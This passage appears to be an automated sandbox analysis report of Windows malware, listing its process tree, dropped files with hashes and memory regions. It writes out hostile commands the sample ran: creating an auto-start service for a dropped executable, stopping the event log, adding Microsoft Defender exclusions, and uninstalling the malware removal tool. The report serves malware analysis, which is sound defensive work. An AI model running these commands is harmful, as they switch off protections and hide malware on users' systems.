- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBKZWAPS"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBKZWAPS"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exeC:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\conhost.execonhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\rstywrmdprzs\esfowblknspo.exeC:\ProgramData\rstywrmdprzs\esfowblknspo.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD50ffe01bfe1fbb6c8466c776a982d99c4
SHA13fc80f6c48bc2d6b91b72c4ff4d1a5b04aa91caa
SHA2562705615a4c94d5f9ccd5d7964c8f6df91bb18712334942d22cfecc8b88fe1a2f
SHA5129422628443fdbbed63987ef552569cc3acde53edda87671f783ddc80bfe744ac52fd1b4f99c6736f21d2e62085aa8749e5eb6050099cd149e7488b56b1fd9318
-
C:\Users\Admin\AppData\Local\Temp\Cab37B5.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar38B6.tmpFilesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Local\Temp\_MEI26002\python312.dllFilesize
6.7MB
MD5550288a078dffc3430c08da888e70810
SHA101b1d31f37fb3fd81d893cc5e4a258e976f5884f
SHA256789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d
SHA5127244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723
-
C:\Users\Admin\AppData\Local\Temp\etc test.exeFilesize
2.5MB
MD5e4e8f85ee773cd79bd76dd7798baf957
SHA1112f53467d2946f2bcf4c55bb4177f25120cda13
SHA256a0a9aa62080c1a543e11e5853fcd6964e598b59a0a7c24de7a7f1d951177e564
SHA51299a1dd206181ef20c572a1a1ed9354cc2f70424a4493cd2e67648b54483f90e0bf291764e4731943c6ed73ab872b3fa8410c0368295d5a025330792a17f19dad
-
C:\Users\Admin\AppData\Local\Temp\fix.exeFilesize
95KB
MD51f327a277466f1bb04aa5cfcd279c0f7
SHA19bcb7bbac28992b9c7c35ba0573dce7db32ca18f
SHA256e8432406bc918c6ce0d245a3bc5bb8c021b218593f94b5d09ebcda7e549f1fc0
SHA51282c750475dc42d974c3fd33a4329bce7e99a5c15bf88fe4e802627b321b6c91f78e8be4b82e72380ee34c4de407878d17b18af26d7f5667104fdc55020f68a9d
-
C:\Users\Admin\AppData\Local\Temp\hamburger.exeFilesize
2.5MB
MD509af9e57d30e6929c115811dfa9c3b7e
SHA1caf9281f7001f92524005c60a34f33543315df52
SHA2563b031ddbb05570ca3ffefa93abbd1cb2891897a34ea9b4a29612858b66a146f2
SHA512023849985162db69160f559002586dbdb4148747f13fa1ff617e75b0f972c778f9f3d6a033dd3fb429d78aa3c20b264d83dc44274d6c0743a3ed1cf88fb045f8
-
C:\Users\Admin\AppData\Local\Temp\tmp400B.tmpFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\tmp4021.tmpFilesize
92KB
MD5bbe71b58e84c50336ee2d3bad3609c39
SHA1bdd3227b48977e583127425cbc2f86ff4077ba10
SHA256b25b7e57924b2382d3178696782b51fa62b68fa7e763081d7a53471cccc1ff3c
SHA51207fcac6778f114fb372dac7ed489624b8e0aed347bc14af77ec36b5201df8b3d99e2a69a384756606030bb146f5c0780f39a274dc5a4b4f6863746ec7fa2ca2a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y0ANJLHUCMIHBTS2SKPD.tempFilesize
7KB
MD537848454b3bb8d1b900c03c90694b897
SHA1a04057a76d236868ebabece8f4343e7f303ae15a
SHA256a757abc55cf2dbc5a06958659a4df21bb6684cc386d46c4eee0c3ca2732d50b4
SHA5123e577854181bf04d09f792b39dafcf964e6deb15d065d4348058fe4e52e2e77535238fa0a56994c227193a65033f83e59b6a120476aa2946ed52826f421946c1
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\Notepad.exeFilesize
7.0MB
MD5150f7378fd18d19ecc002761fa112de5
SHA1a5ef247183d14dcd0d9b112306c1965c38720a1e
SHA256b3bfd7d408a13096897fe8cbaff158cb8ff34f6d2d2269b25a1a268daeef387c
SHA512dd3739f3e7736c6d6319dbf71346addfdab60d668c84b91d9c87bdf5ee7c6ea085b49a314c52338cb196cceb212067fdbf804da91d9f517a34e1b0978ceebb6d
-
\Users\Admin\AppData\Local\Temp\mergedALL.exeFilesize
297KB
MD52359b2a186e08a38296305861dea4231
SHA141716e2710daaebba6f03d009064a149da90c526
SHA256f36f4c7bfb509bcfc5cdfb6eb28149bfca1b6ab3eb001bf74ef1e35f5edce9d6
SHA5126ebcb5f9c3b6d76c59221d1442d4c39cc7a1108ae7ef63f3173cff0fcb5356e622369d2925c0d1992aec3a2605641a69e44891c804d320cbe36e164705d19c54
-
memory/1556-233-0x0000000001CF0000-0x0000000001CF8000-memory.dmpFilesize
32KB
-
memory/1556-232-0x000000001B560000-0x000000001B842000-memory.dmpFilesize
2.9MB
-
memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1604-257-0x00000000000B0000-0x00000000000D0000-memory.dmpFilesize
128KB
-
memory/2248-279-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2248-281-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2248-282-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2248-276-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2248-277-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2248-278-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmpFilesize
120KB
-
memory/2548-240-0x00000000009D0000-0x00000000009D8000-memory.dmpFilesize
32KB
-
memory/2548-239-0x0000000019F90000-0x000000001A272000-memory.dmpFilesize
2.9MB
-
memory/2588-245-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2588-244-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2588-243-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2588-242-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2588-241-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2588-247-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmpFilesize
320KB